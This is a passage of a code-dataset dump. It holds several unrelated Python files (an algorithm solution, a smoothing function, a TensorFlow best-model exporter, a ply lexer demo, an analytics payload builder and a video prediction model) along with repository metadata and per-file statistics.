first_v = od[keys[0]]
last_v = od[keys[-1]]
k_range_len = last_v - first_v
if k_range_len < min_range_len:
min_range_len = k_range_len
min_range = first_v, last_v
i += 1
print('ending main time:', time.time() - sort_end_time)
return min_range
if __name__ == '__main__':
s = Solution()
nums = [[4, 10, 15, 24, 26], [0, 9, 12, 20], [5, 18, 22, 30]]
# nums = [[10], [11]]
# nums = [[11,38,83,
# 84,84,85,88,89,89,92],[28,61,89],[52,77,79,80,81],[21,25,26,26,26,27],[9,83,85,90],[84,85,87],[26,68,70,71],[36,40,41,42,45],[-34,21],[-28,-28,-23,1,13,21,28,37,37,38],[-74,1,2,22,33,35,43,45],[54,96,98,98,99],[43,54,60,65,71,75],[43,46],[50,50,58,67,69],[7,14,15],[78,80,89,89,90],[35,47,63,69,77,92,94]]
# [-74, 1, 2, 22, 33, 35, 43, 45], [54, 96, 98, 98, 99], [43, 54, 60, 65, 71, 75], [43, 46],
# [50, 50, 58, 67, 69], [7, 14, 15], [78, 80, 89, 89, 90], [35, 47, 63, 69, 77, 92, 94]]
nums = BIG_LIST_85
# nums = BIG_LIST_86
min_range = s.smallestRange(nums)
print(min_range)
| 31.651685
| 311
| 0.547746
| 465
| 2,817
| 3.107527
| 0.329032
| 0.055363
| 0.062976
| 0.082353
| 0.287889
| 0.269896
| 0.239446
| 0.204844
| 0.204844
| 0.204844
| 0
| 0.170455
| 0.281505
| 2,817
| 88
| 312
| 32.011364
| 0.543478
| 0.340078
| 0
| 0
| 0
| 0
| 0.023077
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021277
| false
| 0
| 0.12766
| 0
| 0.191489
| 0.106383
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13700654033637b55b5386791b563e0e83f1b925
| 498
|
py
|
Python
|
cimcb/utils/smooth.py
|
CIMCB/cimcb
|
5d30f80423ed94e1068871b30e465b38d451581a
|
[
"MIT"
] | 5
|
2020-05-26T23:45:40.000Z
|
2022-01-13T00:40:14.000Z
|
cimcb/utils/smooth.py
|
CIMCB/cimcb
|
5d30f80423ed94e1068871b30e465b38d451581a
|
[
"MIT"
] | 3
|
2020-10-20T09:03:18.000Z
|
2021-11-01T14:22:05.000Z
|
cimcb/utils/smooth.py
|
KevinMMendez/cimcb
|
fe831253b122ed0ff9e33cbd160ef721abee1e38
|
[
"MIT"
] | 4
|
2020-10-12T07:17:43.000Z
|
2022-03-28T06:28:44.000Z
|
import numpy as np
def smooth(a, WSZ):
# a: NumPy 1-D array containing the data to be smoothed
# WSZ: smoothing window size needs, which must be odd number,
# as in the original MATLAB implementation
if WSZ % 2 == 0:
WSZ = WSZ - 1
out0 = np.convolve(a, np.ones(WSZ, dtype=int), 'valid') / WSZ
r = np.arange(1, WSZ - 1, 2)
start = np.cumsum(a[:WSZ - 1])[::2] / r
stop = (np.cumsum(a[:-WSZ:-1])[::2] / r)[::-1]
return np.concatenate((start, out0, stop))
| 33.2
| 65
| 0.588353
| 83
| 498
| 3.53012
| 0.542169
| 0.054608
| 0.051195
| 0.081911
| 0.102389
| 0.102389
| 0.102389
| 0
| 0
| 0
| 0
| 0.037433
| 0.248996
| 498
| 14
| 66
| 35.571429
| 0.745989
| 0.309237
| 0
| 0
| 0
| 0
| 0.014706
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.111111
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13710731fb3b914385bee296e01c654e62f3641b
| 11,810
|
py
|
Python
|
ezeeai/core/extensions/best_exporter.py
|
jmarine/ezeeai
|
091b4ce3bc5794c534084bff3301b15ba8a9be1a
|
[
"Apache-2.0"
] | 19
|
2019-06-12T03:14:59.000Z
|
2021-05-31T16:02:53.000Z
|
ezeeai/core/extensions/best_exporter.py
|
jmarine/ezeeai
|
091b4ce3bc5794c534084bff3301b15ba8a9be1a
|
[
"Apache-2.0"
] | 29
|
2019-06-27T10:15:38.000Z
|
2022-03-11T23:46:36.000Z
|
ezeeai/core/extensions/best_exporter.py
|
jmarine/ezeeai
|
091b4ce3bc5794c534084bff3301b15ba8a9be1a
|
[
"Apache-2.0"
] | 10
|
2019-05-14T17:45:44.000Z
|
2020-08-26T13:25:04.000Z
|
from __future__ import absolute_import
import abc
import os
import json
import glob
import shutil
from tensorflow.python.estimator import gc
from tensorflow.python.estimator import util
from tensorflow.python.estimator.canned import metric_keys
from tensorflow.python.framework import errors_impl
from tensorflow.python.platform import gfile
from tensorflow.python.platform import tf_logging
from tensorflow.python.summary import summary_iterator
from tensorflow.python.estimator.exporter import Exporter, _SavedModelExporter
def _verify_compare_fn_args(compare_fn):
"""Verifies compare_fn arguments."""
args = set(util.fn_args(compare_fn))
if 'best_eval_result' not in args:
raise ValueError(
'compare_fn (%s) must include best_eval_result argument.' % compare_fn)
if 'current_eval_result' not in args:
raise ValueError(
'compare_fn (%s) must include current_eval_result argument.' %
compare_fn)
non_valid_args = list(args - set(['best_eval_result', 'current_eval_result']))
if non_valid_args:
raise ValueError('compare_fn (%s) has following not expected args: %s' %
(compare_fn, non_valid_args))
def _loss_smaller(best_eval_result, current_eval_result):
"""Compares two evaluation results and returns true if the 2nd one is smaller.
Both evaluation results should have the values for MetricKeys.LOSS, which are
used for comparison.
Args:
best_eval_result: best eval metrics.
current_eval_result: current eval metrics.
Returns:
True if the loss of current_eval_result is smaller; otherwise, False.
Raises:
ValueError: If input eval result is None or no loss is available.
"""
default_key = metric_keys.MetricKeys.LOSS
if not best_eval_result or default_key not in best_eval_result:
raise ValueError(
'best_eval_result cannot be empty or no loss is found in it.')
if not current_eval_result or default_key not in current_eval_result:
raise ValueError(
'current_eval_result cannot be empty or no loss is found in it.')
return best_eval_result[default_key] > current_eval_result[default_key]
class BestExporter(Exporter):
"""This class exports the serving graph and checkpoints of the best models.
This class performs a model export everytime when the new model is better
than any exsiting model.
"""
def __init__(self,
name='best_exporter',
serving_input_receiver_fn=None,
event_file_pattern='eval/*.tfevents.*',
compare_fn=_loss_smaller,
assets_extra=None,
as_text=False,
exports_to_keep=5):
"""Create an `Exporter` to use with `tf.estimator.EvalSpec`.
Example of creating a BestExporter for training and evluation:
```python
def make_train_and_eval_fn():
# Set up feature columns.
categorial_feature_a = (
tf.feature_column.categorical_column_with_hash_bucket(...))
categorial_feature_a_emb = embedding_column(
categorical_column=categorial_feature_a, ...)
... # other feature columns
estimator = tf.estimator.DNNClassifier(
config=tf.estimator.RunConfig(
model_dir='/my_model', save_summary_steps=100),
feature_columns=[categorial_feature_a_emb, ...],
hidden_units=[1024, 512, 256])
serving_feature_spec = tf.feature_column.make_parse_example_spec(
categorial_feature_a_emb)
serving_input_receiver_fn = (
tf.estimator.export.build_parsing_serving_input_receiver_fn(
serving_feature_spec))
exporter = tf.estimator.BestExporter(
name="best_exporter",
serving_input_receiver_fn=serving_input_receiver_fn,
exports_to_keep=5)
train_spec = tf.estimator.TrainSpec(...)
eval_spec = [tf.estimator.EvalSpec(
input_fn=eval_input_fn,
steps=100,
exporters=exporter,
start_delay_secs=0,
throttle_secs=5)]
return tf.estimator.DistributedTrainingSpec(estimator, train_spec,
eval_spec)
```
Args:
name: unique name of this `Exporter` that is going to be used in the
export path.
serving_input_receiver_fn: a function that takes no arguments and returns
a `ServingInputReceiver`.
event_file_pattern: event file name pattern relative to model_dir. If
None, however, the exporter would not be preemption-safe. To bex
preemption-safe, event_file_pattern should be specified.
compare_fn: a function that compares two evaluation results and returns
true if current evaluation result is better. Follows the signature:
* Args:
* `best_eval_result`: This is the evaluation result of the best model.
* `current_eval_result`: This is the evaluation result of current
candidate model.
* Returns:
True if current evaluation result is better; otherwise, False.
assets_extra: An optional dict specifying how to populate the assets.extra
directory within the exported SavedModel. Each key should give the
destination path (including the filename) relative to the assets.extra
directory. The corresponding value gives the full path of the source
file to be copied. For example, the simple case of copying a single
file without renaming it is specified as `{'my_asset_file.txt':
'/path/to/my_asset_file.txt'}`.
as_text: whether to write the SavedModel proto in text format. Defaults to
`False`.
exports_to_keep: Number of exports to keep. Older exports will be
garbage-collected. Defaults to 5. Set to `None` to disable garbage
collection.
Raises:
ValueError: if any arguments is invalid.
"""
self._compare_fn = compare_fn
if self._compare_fn is None:
raise ValueError('`compare_fn` must not be None.')
_verify_compare_fn_args(self._compare_fn)
self._saved_model_exporter = _SavedModelExporter(
name, serving_input_receiver_fn, assets_extra, as_text)
self._event_file_pattern = event_file_pattern
self._model_dir = None
self._best_eval_result = None
self._exports_to_keep = exports_to_keep
self._log = {}
if exports_to_keep is not None and exports_to_keep <= 0:
raise ValueError(
'`exports_to_keep`, if provided, must be positive number')
@property
def name(self):
return self._saved_model_exporter.name
def export(self, estimator, export_path, checkpoint_path, eval_result,
is_the_final_export):
export_result = None
if self._model_dir != estimator.model_dir and self._event_file_pattern:
# Loads best metric from event files.
tf_logging.info('Loading best metric from event files.')
self._model_dir = estimator.model_dir
full_event_file_pattern = os.path.join(self._model_dir,
self._event_file_pattern)
self._best_eval_result = self._get_best_eval_result(
full_event_file_pattern)
if os.path.isfile(os.path.join(export_path, 'export.log')):
self._log = {}
try:
self._log = json.load(open(os.path.join(export_path, 'export.log'), 'r'))
except json.JSONDecodeError:
pass
if len(self._log) == 0:
self._best_eval_result = None
if self._best_eval_result is None or self._compare_fn(
best_eval_result=self._best_eval_result,
current_eval_result=eval_result):
tf_logging.info('Performing best model export.')
self._best_eval_result = eval_result
export_result = self._saved_model_exporter.export(
estimator, export_path, checkpoint_path, eval_result,
is_the_final_export)
export_result_path = export_result.decode("utf-8")
self._log[export_result_path] = {k: float(v) for k, v in eval_result.items()}
self._copy_checkpoint(checkpoint_path, export_result_path, eval_result["global_step"])
self._garbage_collect_exports(export_path)
with open(os.path.join(export_path, 'export.log'), 'w') as fp:
json.dump(self._log, fp)
return export_result
def _copy_checkpoint(self, checkpoint_pattern, dest_path, step):
for file in glob.glob(checkpoint_pattern + '*'):
shutil.copy(file, dest_path)
with open(os.path.join(dest_path, 'checkpoint'), 'w') as fp:
text = 'model_checkpoint_path: "model.ckpt-number"\n'.replace('number', str(step))
fp.write(text)
fp.close()
def _garbage_collect_exports(self, export_dir_base):
"""Deletes older exports, retaining only a given number of the most recent.
Export subdirectories are assumed to be named with monotonically increasing
integers; the most recent are taken to be those with the largest values.
Args:
export_dir_base: the base directory under which each export is in a
versioned subdirectory.
"""
if self._exports_to_keep is None:
return
def _export_version_parser(path):
# create a simple parser that pulls the export_version from the directory.
filename = os.path.basename(path.path)
if not (len(filename) == 10 and filename.isdigit()):
return None
return path._replace(export_version=int(filename))
# pylint: disable=protected-access
keep_filter = gc._largest_export_versions(self._exports_to_keep)
delete_filter = gc._negation(keep_filter)
for p in delete_filter(
gc._get_paths(export_dir_base, parser=_export_version_parser)):
try:
del self._log[p.path]
gfile.DeleteRecursively(p.path)
except errors_impl.NotFoundError as e:
tf_logging.warn('Can not delete %s recursively: %s', p.path, e)
# pylint: enable=protected-access
def _get_best_eval_result(self, event_files):
"""Get the best eval result from event files.
Args:
event_files: Absolute pattern of event files.
Returns:
The best eval result.
"""
if not event_files:
return None
event_count = 0
best_eval_result = None
for event_file in gfile.Glob(os.path.join(event_files)):
for event in summary_iterator.summary_iterator(event_file):
if event.HasField('summary'):
event_eval_result = {}
for value in event.summary.value:
if value.HasField('simple_value'):
event_eval_result[value.tag] = value.simple_value
if event_eval_result:
if best_eval_result is None or self._compare_fn(
best_eval_result, event_eval_result):
event_count += 1
best_eval_result = event_eval_result
if event_count < 2:
return None
return best_eval_result
| 44.398496
| 98
| 0.637934
| 1,453
| 11,810
| 4.908465
| 0.224363
| 0.070107
| 0.051038
| 0.021593
| 0.229248
| 0.161245
| 0.125631
| 0.103337
| 0.060853
| 0.060853
| 0
| 0.003598
| 0.294073
| 11,810
| 265
| 99
| 44.566038
| 0.851865
| 0.355377
| 0
| 0.100719
| 0
| 0
| 0.100838
| 0.006212
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064748
| false
| 0.007194
| 0.100719
| 0.007194
| 0.23741
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1372bb8d33de36c039935d2eac285248cdacdfb7
| 301
|
py
|
Python
|
token_train/quickdemo(1)(1).py
|
Tatsuya26/processamento_de_linguagens
|
e89ab8461bcf3264a79f10b7ebc2208eff271c6c
|
[
"MIT"
] | null | null | null |
token_train/quickdemo(1)(1).py
|
Tatsuya26/processamento_de_linguagens
|
e89ab8461bcf3264a79f10b7ebc2208eff271c6c
|
[
"MIT"
] | null | null | null |
token_train/quickdemo(1)(1).py
|
Tatsuya26/processamento_de_linguagens
|
e89ab8461bcf3264a79f10b7ebc2208eff271c6c
|
[
"MIT"
] | null | null | null |
import ply.lex as lex
tokens =["NUM","OPERADORES"]
t_NUM = '\d+'
t_OPERADORES = '[+|*|-]'
t_ignore='\n\t '
def t_error(t):
print("Erro")
print(t)
lexer = lex.lex()
# 1+2 1-2 1*2
# ola mundo
import sys
for line in sys.stdin:
lexer.input(line)
for tok in lexer:
print(tok)
| 13.086957
| 28
| 0.584718
| 52
| 301
| 3.307692
| 0.519231
| 0.034884
| 0.034884
| 0.046512
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025974
| 0.232558
| 301
| 23
| 29
| 13.086957
| 0.718615
| 0.069767
| 0
| 0
| 0
| 0
| 0.115108
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071429
| false
| 0
| 0.142857
| 0
| 0.214286
| 0.214286
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
137402a725b61eaf0c95cb37df89ef2b691ce663
| 2,015
|
py
|
Python
|
src/ctc/protocols/fei_utils/analytics/payload_crud.py
|
fei-protocol/checkthechain
|
ec838f3d0d44af228f45394d9ba8d8eb7f677520
|
[
"MIT"
] | 94
|
2022-02-15T19:34:49.000Z
|
2022-03-26T19:26:22.000Z
|
src/ctc/protocols/fei_utils/analytics/payload_crud.py
|
fei-protocol/checkthechain
|
ec838f3d0d44af228f45394d9ba8d8eb7f677520
|
[
"MIT"
] | 7
|
2022-03-03T02:58:47.000Z
|
2022-03-11T18:41:05.000Z
|
src/ctc/protocols/fei_utils/analytics/payload_crud.py
|
fei-protocol/checkthechain
|
ec838f3d0d44af228f45394d9ba8d8eb7f677520
|
[
"MIT"
] | 7
|
2022-02-15T17:53:07.000Z
|
2022-03-17T19:14:17.000Z
|
from __future__ import annotations
import typing
from ctc import spec
from . import timestamp_crud
from . import metric_crud
from . import analytics_spec
async def async_create_payload(
*,
blocks: typing.Sequence[spec.BlockNumberReference] | None = None,
timestamps: typing.Sequence[int] | None = None,
timescale: analytics_spec.TimescaleSpec | None = None,
end_time: analytics_spec.Timestamp | None = None,
window_size: str | None = None,
interval_size: str | None = None,
provider: spec.ProviderSpec = None,
) -> analytics_spec.AnalyticsPayload:
"""create data payload from scratch"""
time_data = await timestamp_crud.async_get_time_data(
blocks=blocks,
timestamps=timestamps,
timescale=timescale,
end_time=end_time,
window_size=window_size,
interval_size=interval_size,
provider=provider,
)
# get data
data = await metric_crud.async_get_metrics(
blocks=time_data['block_numbers']
)
return {
'version': '0.1.0',
#
# time data
'n_samples': time_data['n_samples'],
'window_size': time_data['window_size'],
'interval_size': time_data['interval_size'],
'timestamps': time_data['timestamps'],
'block_numbers': time_data['block_numbers'],
'created_at_timestamp': time_data['created_at_timestamp'],
#
# metric data
'data': data,
}
# def update_payload(
# timescale: analytics_spec.Timescale,
# old_payload: analytics_spec.AnalyticsPayload,
# ) -> analytics_spec.AnalyticsPayload:
# new_timestamps = get_new_timestamps(
# timescale=timescale,
# old_payload=old_payload,
# )
# new_blocks = get_new_blocks(
# new_timestamps=new_timestamps,
# old_payload=old_payload,
# )
# new_metrics = get_metrics(blocks=new_blocks)
# return combine_new_data(
# old_payload=old_payload,
# new_metrics=new_metrics,
# )
| 27.22973
| 69
| 0.658065
| 223
| 2,015
| 5.609865
| 0.2287
| 0.063949
| 0.069544
| 0.047962
| 0.066347
| 0.047962
| 0
| 0
| 0
| 0
| 0
| 0.001965
| 0.242184
| 2,015
| 73
| 70
| 27.60274
| 0.817289
| 0.272457
| 0
| 0
| 0
| 0
| 0.128917
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.157895
| 0
| 0.184211
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1374addc1e8f402af9273db13845fe70ea5229f1
| 18,118
|
py
|
Python
|
research/video_prediction/prediction_model.py
|
mbz/models
|
98dcd8dbcb1027e4b22f79113018df30da4b8590
|
[
"Apache-2.0"
] | 1
|
2021-10-05T13:34:44.000Z
|
2021-10-05T13:34:44.000Z
|
research/video_prediction/prediction_model.py
|
mbz/models
|
98dcd8dbcb1027e4b22f79113018df30da4b8590
|
[
"Apache-2.0"
] | null | null | null |
research/video_prediction/prediction_model.py
|
mbz/models
|
98dcd8dbcb1027e4b22f79113018df30da4b8590
|
[
"Apache-2.0"
] | 1
|
2020-11-14T04:15:00.000Z
|
2020-11-14T04:15:00.000Z
|
# Copyright 2016 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Model architecture for predictive model, including CDNA, DNA, and STP."""
import numpy as np
import tensorflow as tf
import tensorflow.contrib.slim as slim
from tensorflow.python.platform import flags
from tensorflow.contrib.layers.python import layers as tf_layers
from lstm_ops import basic_conv_lstm_cell
FLAGS = flags.FLAGS
# Amount to use when lower bounding tensors
RELU_SHIFT = 1e-12
# kernel size for DNA and CDNA.
DNA_KERN_SIZE = 5
def kl_divergence(mu, log_sigma):
"""KL divergence of diagonal gaussian N(mu,exp(log_sigma)) and N(0,1).
Args:
mu: mu parameter of the distribution.
log_sigma: log(sigma) parameter of the distribution.
Returns:
the KL loss.
"""
return -.5 * tf.reduce_sum(1. + log_sigma - tf.square(mu) - tf.exp(log_sigma),
axis=1)
def construct_latent_tower(images):
"""Builds convolutional latent tower for stochastic model.
At training time this tower generates a latent distribution (mean and std)
conditioned on the entire video. This latent variable will be fed to the
main tower as an extra variable to be used for future frames prediction.
At inference time, the tower is disabled and only returns latents sampled
from N(0,1).
If the multi_latent flag is on, a different latent for every timestep would
be generated.
Args:
images: tensor of ground truth image sequences
Returns:
latent_mean: predicted latent mean
latent_std: predicted latent standard deviation
latent_loss: loss of the latent twoer
samples: random samples sampled from standard guassian
"""
with slim.arg_scope([slim.conv2d], reuse=False):
stacked_images = tf.concat(images, 3)
latent_enc1 = slim.conv2d(
stacked_images,
32, [3, 3],
stride=2,
scope='latent_conv1',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'latent_norm1'})
latent_enc2 = slim.conv2d(
latent_enc1,
64, [3, 3],
stride=2,
scope='latent_conv2',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'latent_norm2'})
latent_enc3 = slim.conv2d(
latent_enc2,
64, [3, 3],
stride=1,
scope='latent_conv3',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'latent_norm3'})
latent_mean = slim.conv2d(
latent_enc3,
FLAGS.latent_channels, [3, 3],
stride=2,
activation_fn=None,
scope='latent_mean',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'latent_norm_mean'})
latent_std = slim.conv2d(
latent_enc3,
FLAGS.latent_channels, [3, 3],
stride=2,
scope='latent_std',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'latent_std_norm'})
latent_std += FLAGS.latent_std_min
divergence = kl_divergence(latent_mean, latent_std)
latent_loss = tf.reduce_mean(divergence)
if FLAGS.multi_latent:
# timestep x batch_size x latent_size
samples = tf.random_normal(
[FLAGS.sequence_length-1] + latent_mean.shape, 0, 1,
dtype=tf.float32)
else:
# batch_size x latent_size
samples = tf.random_normal(latent_mean.shape, 0, 1, dtype=tf.float32)
if FLAGS.inference_time:
# No latent tower at inference time, just standard gaussian.
return None, None, None, samples
else:
return latent_mean, latent_std, latent_loss, samples
def construct_model(images,
actions=None,
states=None,
iter_num=-1.0,
k=-1,
use_state=True,
num_masks=10,
stp=False,
cdna=True,
dna=False,
context_frames=2):
"""Build convolutional lstm video predictor using STP, CDNA, or DNA.
Args:
images: tensor of ground truth image sequences
actions: tensor of action sequences
states: tensor of ground truth state sequences
iter_num: tensor of the current training iteration (for sched. sampling)
k: constant used for scheduled sampling. -1 to feed in own prediction.
use_state: True to include state and action in prediction
num_masks: the number of different pixel motion predictions (and
the number of masks for each of those predictions)
stp: True to use Spatial Transformer Predictor (STP)
cdna: True to use Convoluational Dynamic Neural Advection (CDNA)
dna: True to use Dynamic Neural Advection (DNA)
context_frames: number of ground truth frames to pass in before
feeding in own predictions
Returns:
gen_images: predicted future image frames
gen_states: predicted future states
Raises:
ValueError: if more than one network option specified or more than 1 mask
specified for DNA model.
"""
# Each image is being used twice, in latent tower and main tower.
# This is to make sure we are using the *same* image for both, ...
# ... given how TF queues work.
images = [tf.identity(image) for image in images]
if stp + cdna + dna != 1:
raise ValueError('More than one, or no network option specified.')
batch_size, img_height, img_width, color_channels = images[0].get_shape()[0:4]
lstm_func = basic_conv_lstm_cell
# Generated robot states and images.
gen_states, gen_images = [], []
current_state = states[0]
if k == -1:
feedself = True
else:
# Scheduled sampling:
# Calculate number of ground-truth frames to pass in.
num_ground_truth = tf.to_int32(
tf.round(tf.to_float(batch_size) * (k / (k + tf.exp(iter_num / k)))))
feedself = False
# LSTM state sizes and states.
lstm_size = np.int32(np.array([32, 32, 64, 64, 128, 64, 32]))
lstm_state1, lstm_state2, lstm_state3, lstm_state4 = None, None, None, None
lstm_state5, lstm_state6, lstm_state7 = None, None, None
# Latent tower
latent_loss = 0.0
if FLAGS.stochastic_model:
latent_tower_outputs = construct_latent_tower(images)
latent_mean, latent_std, latent_loss, samples = latent_tower_outputs
# Main tower
for image, action in zip(images[:-1], actions[:-1]):
# Reuse variables after the first timestep.
reuse = bool(gen_images)
done_warm_start = len(gen_images) > context_frames - 1
with slim.arg_scope(
[lstm_func, slim.layers.conv2d, slim.layers.fully_connected,
tf_layers.layer_norm, slim.layers.conv2d_transpose],
reuse=reuse):
if feedself and done_warm_start:
# Feed in generated image.
prev_image = gen_images[-1]
elif done_warm_start:
# Scheduled sampling
prev_image = scheduled_sample(image, gen_images[-1], batch_size,
num_ground_truth)
else:
# Always feed in ground_truth
prev_image = image
# Predicted state is always fed back in
state_action = tf.concat(axis=1, values=[action, current_state])
enc0 = slim.layers.conv2d(
prev_image,
32, [5, 5],
stride=2,
scope='scale1_conv1',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'layer_norm1'})
hidden1, lstm_state1 = lstm_func(
enc0, lstm_state1, lstm_size[0], scope='state1')
hidden1 = tf_layers.layer_norm(hidden1, scope='layer_norm2')
hidden2, lstm_state2 = lstm_func(
hidden1, lstm_state2, lstm_size[1], scope='state2')
hidden2 = tf_layers.layer_norm(hidden2, scope='layer_norm3')
enc1 = slim.layers.conv2d(
hidden2, hidden2.get_shape()[3], [3, 3], stride=2, scope='conv2')
hidden3, lstm_state3 = lstm_func(
enc1, lstm_state3, lstm_size[2], scope='state3')
hidden3 = tf_layers.layer_norm(hidden3, scope='layer_norm4')
hidden4, lstm_state4 = lstm_func(
hidden3, lstm_state4, lstm_size[3], scope='state4')
hidden4 = tf_layers.layer_norm(hidden4, scope='layer_norm5')
enc2 = slim.layers.conv2d(
hidden4, hidden4.get_shape()[3], [3, 3], stride=2, scope='conv3')
# Pass in state and action.
smear = tf.reshape(
state_action,
[int(batch_size), 1, 1, int(state_action.get_shape()[1])])
smear = tf.tile(
smear, [1, int(enc2.get_shape()[1]), int(enc2.get_shape()[2]), 1])
if use_state:
enc2 = tf.concat(axis=3, values=[enc2, smear])
# Setup latent
if FLAGS.stochastic_model:
latent = samples
if FLAGS.multi_latent:
latent = samples[timestep]
if not FLAGS.inference_time:
latent = tf.cond(iter_num < FLAGS.num_iterations_1st_stage,
lambda: tf.identity(latent),
lambda: latent_mean + tf.exp(latent_std / 2.0) * latent)
with tf.control_dependencies([latent]):
enc2 = tf.concat([enc2, latent], 3)
enc3 = slim.layers.conv2d(
enc2, hidden4.get_shape()[3], [1, 1], stride=1, scope='conv4')
hidden5, lstm_state5 = lstm_func(
enc3, lstm_state5, lstm_size[4], scope='state5') # last 8x8
hidden5 = tf_layers.layer_norm(hidden5, scope='layer_norm6')
enc4 = slim.layers.conv2d_transpose(
hidden5, hidden5.get_shape()[3], 3, stride=2, scope='convt1')
hidden6, lstm_state6 = lstm_func(
enc4, lstm_state6, lstm_size[5], scope='state6') # 16x16
hidden6 = tf_layers.layer_norm(hidden6, scope='layer_norm7')
# Skip connection.
hidden6 = tf.concat(axis=3, values=[hidden6, enc1]) # both 16x16
enc5 = slim.layers.conv2d_transpose(
hidden6, hidden6.get_shape()[3], 3, stride=2, scope='convt2')
hidden7, lstm_state7 = lstm_func(
enc5, lstm_state7, lstm_size[6], scope='state7') # 32x32
hidden7 = tf_layers.layer_norm(hidden7, scope='layer_norm8')
# Skip connection.
hidden7 = tf.concat(axis=3, values=[hidden7, enc0]) # both 32x32
enc6 = slim.layers.conv2d_transpose(
hidden7,
hidden7.get_shape()[3], 3, stride=2, scope='convt3', activation_fn=None,
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'layer_norm9'})
if dna:
# Using largest hidden state for predicting untied conv kernels.
enc7 = slim.layers.conv2d_transpose(
enc6, DNA_KERN_SIZE**2, 1, stride=1, scope='convt4', activation_fn=None)
else:
# Using largest hidden state for predicting a new image layer.
enc7 = slim.layers.conv2d_transpose(
enc6, color_channels, 1, stride=1, scope='convt4', activation_fn=None)
# This allows the network to also generate one image from scratch,
# which is useful when regions of the image become unoccluded.
transformed = [tf.nn.sigmoid(enc7)]
if stp:
stp_input0 = tf.reshape(hidden5, [int(batch_size), -1])
stp_input1 = slim.layers.fully_connected(
stp_input0, 100, scope='fc_stp')
transformed += stp_transformation(prev_image, stp_input1, num_masks)
elif cdna:
cdna_input = tf.reshape(hidden5, [int(batch_size), -1])
transformed += cdna_transformation(prev_image, cdna_input, num_masks,
int(color_channels))
elif dna:
# Only one mask is supported (more should be unnecessary).
if num_masks != 1:
raise ValueError('Only one mask is supported for DNA model.')
transformed = [dna_transformation(prev_image, enc7)]
masks = slim.layers.conv2d_transpose(
enc6, num_masks + 1, 1, stride=1, scope='convt7', activation_fn=None)
masks = tf.reshape(
tf.nn.softmax(tf.reshape(masks, [-1, num_masks + 1])),
[int(batch_size), int(img_height), int(img_width), num_masks + 1])
mask_list = tf.split(axis=3, num_or_size_splits=num_masks + 1, value=masks)
output = mask_list[0] * prev_image
for layer, mask in zip(transformed, mask_list[1:]):
output += layer * mask
gen_images.append(output)
current_state = slim.layers.fully_connected(
state_action,
int(current_state.get_shape()[1]),
scope='state_pred',
activation_fn=None)
gen_states.append(current_state)
return gen_images, gen_states, latent_loss
## Utility functions
def stp_transformation(prev_image, stp_input, num_masks):
"""Apply spatial transformer predictor (STP) to previous image.
Args:
prev_image: previous image to be transformed.
stp_input: hidden layer to be used for computing STN parameters.
num_masks: number of masks and hence the number of STP transformations.
Returns:
List of images transformed by the predicted STP parameters.
"""
# Only import spatial transformer if needed.
from spatial_transformer import transformer
identity_params = tf.convert_to_tensor(
np.array([1.0, 0.0, 0.0, 0.0, 1.0, 0.0], np.float32))
transformed = []
for i in range(num_masks - 1):
params = slim.layers.fully_connected(
stp_input, 6, scope='stp_params' + str(i),
activation_fn=None) + identity_params
transformed.append(transformer(prev_image, params))
return transformed
def cdna_transformation(prev_image, cdna_input, num_masks, color_channels):
"""Apply convolutional dynamic neural advection to previous image.
Args:
prev_image: previous image to be transformed.
cdna_input: hidden lyaer to be used for computing CDNA kernels.
num_masks: the number of masks and hence the number of CDNA transformations.
color_channels: the number of color channels in the images.
Returns:
List of images transformed by the predicted CDNA kernels.
"""
batch_size = int(cdna_input.get_shape()[0])
height = int(prev_image.get_shape()[1])
